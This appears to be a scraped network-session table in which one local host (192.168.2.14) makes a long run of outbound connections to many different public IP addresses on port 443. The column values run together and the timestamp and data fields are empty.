                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18416192.168.2.1445308212.214.141.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18417192.168.2.144331625.27.109.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18418192.168.2.1435792187.52.176.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18419192.168.2.1434508152.109.217.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18420192.168.2.1449222219.149.228.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18421192.168.2.1449364121.243.215.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18422192.168.2.143634032.230.81.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18423192.168.2.1453790122.95.171.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18424192.168.2.1458976117.73.61.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18425192.168.2.145114625.68.250.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18426192.168.2.1453010191.192.136.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18427192.168.2.145487438.11.36.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18428192.168.2.144718288.34.56.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18429192.168.2.1460610117.99.86.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18430192.168.2.1455232167.207.20.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18431192.168.2.1456894149.18.183.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18432192.168.2.1451522147.47.121.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18433192.168.2.1440502206.34.242.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18434192.168.2.143811882.140.137.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18435192.168.2.145994851.186.156.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18436192.168.2.1443006133.49.240.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18437192.168.2.1445982208.174.42.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18438192.168.2.1444278150.102.68.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18439192.168.2.1447620153.181.88.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18440192.168.2.145920878.157.23.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18441192.168.2.143366042.139.172.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18442192.168.2.1441204179.56.204.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18443192.168.2.145633250.180.153.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18444192.168.2.1443900148.116.119.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18445192.168.2.1459786171.119.211.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18446192.168.2.145067419.222.35.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18447192.168.2.1441382119.141.243.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18448192.168.2.145293414.129.8.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18449192.168.2.1450980206.227.183.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18450192.168.2.1435102152.136.215.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18451192.168.2.1439126203.108.251.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18452192.168.2.1452368106.137.232.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18453192.168.2.143804417.72.219.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18454192.168.2.145839448.153.87.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18455192.168.2.144625649.107.241.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18456192.168.2.14587128.230.105.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18457192.168.2.1453672135.23.227.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18458192.168.2.1459970170.121.140.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18459192.168.2.143965644.184.63.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18460192.168.2.1453728128.251.6.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18461192.168.2.1445236157.170.73.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18462192.168.2.144136449.211.125.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18463192.168.2.1459016102.232.136.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18464192.168.2.1437024132.215.182.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18465192.168.2.144544260.59.188.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18466192.168.2.1433006103.224.41.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18467192.168.2.1457404121.77.216.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18468192.168.2.1455308120.154.194.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18469192.168.2.145111891.238.82.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18470192.168.2.1434160220.36.226.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18471192.168.2.14574142.132.125.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18472192.168.2.1444628208.202.87.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18473192.168.2.1441992195.24.4.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18474192.168.2.143400290.186.77.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18475192.168.2.1438266146.230.251.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18476192.168.2.1447216181.24.82.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18477192.168.2.1432986155.100.119.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18478192.168.2.1453336219.103.193.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18479192.168.2.1439338184.29.53.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18480192.168.2.1458164176.126.129.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18481192.168.2.143795489.87.221.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18482192.168.2.1459050144.218.130.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18483192.168.2.14368782.159.181.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18484192.168.2.1439012132.144.54.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18485192.168.2.1438094153.133.46.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18486192.168.2.144919674.253.28.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18487192.168.2.1444138153.228.235.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18488192.168.2.146007889.201.126.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18489192.168.2.143444617.173.70.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18490192.168.2.1459262200.0.188.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18491192.168.2.145923041.65.158.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18492192.168.2.144740642.150.225.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18493192.168.2.1439062133.155.114.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18494192.168.2.1448214106.65.183.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18495192.168.2.1442092101.251.98.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18496192.168.2.1436818185.3.9.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18497192.168.2.1451192159.11.187.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18498192.168.2.1438938173.115.15.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18499192.168.2.144991280.157.227.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18500192.168.2.145088489.15.184.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18501192.168.2.143725018.228.127.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18502192.168.2.1436768119.155.247.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18503192.168.2.145940641.24.141.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18504192.168.2.145702290.241.117.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18505192.168.2.1453164179.29.76.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18506192.168.2.1437088186.227.64.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18507192.168.2.144271662.164.87.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18508192.168.2.145936679.222.64.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18509192.168.2.144814673.4.99.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18510192.168.2.143853014.161.235.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18511192.168.2.1443024162.213.103.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18512192.168.2.146047864.81.210.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18513192.168.2.14552565.5.15.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18514192.168.2.1459900149.47.157.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18515192.168.2.1456322146.141.54.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18516192.168.2.144201661.201.207.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18517192.168.2.1458062129.191.9.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18518192.168.2.1453822116.56.39.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18519192.168.2.1445900103.236.201.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18520192.168.2.1434634123.128.232.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18521192.168.2.1451052107.85.12.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18522192.168.2.1444886186.17.172.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18523192.168.2.143608048.177.60.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18524192.168.2.1454150162.108.55.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18525192.168.2.145959643.200.123.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18526192.168.2.143281454.50.182.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18527192.168.2.144485244.165.166.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18528192.168.2.1438620148.74.237.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18529192.168.2.1455550145.96.236.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18530192.168.2.1450346162.4.115.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18531192.168.2.143395476.233.225.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18532192.168.2.143516493.75.8.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18533192.168.2.145754490.115.41.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18534192.168.2.144107684.188.188.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18535192.168.2.145888446.67.193.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18536192.168.2.143824241.117.65.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18537192.168.2.1433698103.123.151.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18538192.168.2.1449802151.37.48.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18539192.168.2.144873891.136.197.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18540192.168.2.1460978180.235.80.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18541192.168.2.1442768117.39.73.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18542192.168.2.143718853.52.28.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18543192.168.2.143948212.126.62.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18544192.168.2.145653896.70.132.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18545192.168.2.1446048124.139.42.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18546192.168.2.1450308121.186.225.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18547192.168.2.1437544179.21.81.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18548192.168.2.14518084.103.252.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18549192.168.2.1443926118.252.83.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18550192.168.2.145182462.171.114.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18551192.168.2.1442812169.232.16.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18552192.168.2.1438438162.68.143.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18553192.168.2.1460110116.225.129.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18554192.168.2.1460354173.239.19.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18555192.168.2.144217064.26.144.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18556192.168.2.1443158159.71.159.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18557192.168.2.1437814156.59.148.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18558192.168.2.1442890138.206.126.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18559192.168.2.143442883.234.4.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18560192.168.2.143572819.220.48.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18561192.168.2.144112288.62.53.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18562192.168.2.1457216205.220.8.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18563192.168.2.143457437.101.25.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18564192.168.2.144030060.136.254.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18565192.168.2.145311260.198.62.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18566192.168.2.1453176124.32.175.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18567192.168.2.143650876.249.78.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18568192.168.2.1459832216.83.205.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18569192.168.2.1439268120.43.58.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18570192.168.2.143637841.34.91.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18571192.168.2.145360443.127.196.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18572192.168.2.1433418105.102.53.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18573192.168.2.1455278211.233.14.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18574192.168.2.145240081.136.162.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18575192.168.2.1447880104.217.89.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18576192.168.2.1435924184.103.47.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18577192.168.2.145517089.182.76.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18578192.168.2.144871075.229.173.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18579192.168.2.145942299.80.128.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18580192.168.2.1447376141.69.13.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18581192.168.2.143615054.95.237.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18582192.168.2.143848252.27.47.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18583192.168.2.1445240134.151.139.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18584192.168.2.1452260157.38.39.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18585192.168.2.1444232150.33.202.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18586192.168.2.1459112173.121.183.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18587192.168.2.144795274.224.84.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18588192.168.2.1448432130.184.128.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18589192.168.2.1433392187.116.60.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18590192.168.2.1456910202.121.8.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18591192.168.2.1457608134.12.43.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18592192.168.2.1454326140.62.185.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18593192.168.2.144413865.212.200.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18594192.168.2.1435502139.172.83.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18595192.168.2.143921860.114.27.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18596192.168.2.1450376177.236.14.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18597192.168.2.143851842.79.89.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18598192.168.2.1442476116.80.37.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18599192.168.2.143596271.4.101.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18600192.168.2.145590874.206.178.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18601192.168.2.1458940200.235.125.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18602192.168.2.1445622187.255.67.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18603192.168.2.1453020212.68.106.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18604192.168.2.1445984137.82.128.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18605192.168.2.1439146172.55.46.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18606192.168.2.144839236.181.108.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18607192.168.2.144301448.72.73.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18608192.168.2.144646846.14.109.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18609192.168.2.1438898135.135.13.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18610192.168.2.1438256190.136.81.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18611192.168.2.146038471.113.255.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18612192.168.2.1442250172.112.211.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18613192.168.2.1438678118.227.156.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18614192.168.2.1457298107.101.176.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18615192.168.2.144810279.179.107.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18616192.168.2.145963231.179.243.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18617192.168.2.1434212162.98.47.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18618192.168.2.144557473.120.238.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18619192.168.2.1441272211.93.68.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18620192.168.2.1443736124.173.204.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18621192.168.2.144793899.106.65.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18622192.168.2.1442348126.47.86.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18623192.168.2.145027024.2.98.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18624192.168.2.1458338126.157.206.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18625192.168.2.143550480.163.202.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18626192.168.2.1440934191.241.119.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18627192.168.2.145913479.46.157.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18628192.168.2.1452712153.204.110.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18629192.168.2.143719278.20.223.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18630192.168.2.1438428182.67.185.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18631192.168.2.1448170111.87.119.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18632192.168.2.144375096.91.228.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18633192.168.2.144282273.62.242.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18634192.168.2.143781273.175.126.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18635192.168.2.1441632162.33.210.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18636192.168.2.144074292.93.40.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18637192.168.2.1456784204.62.124.124443
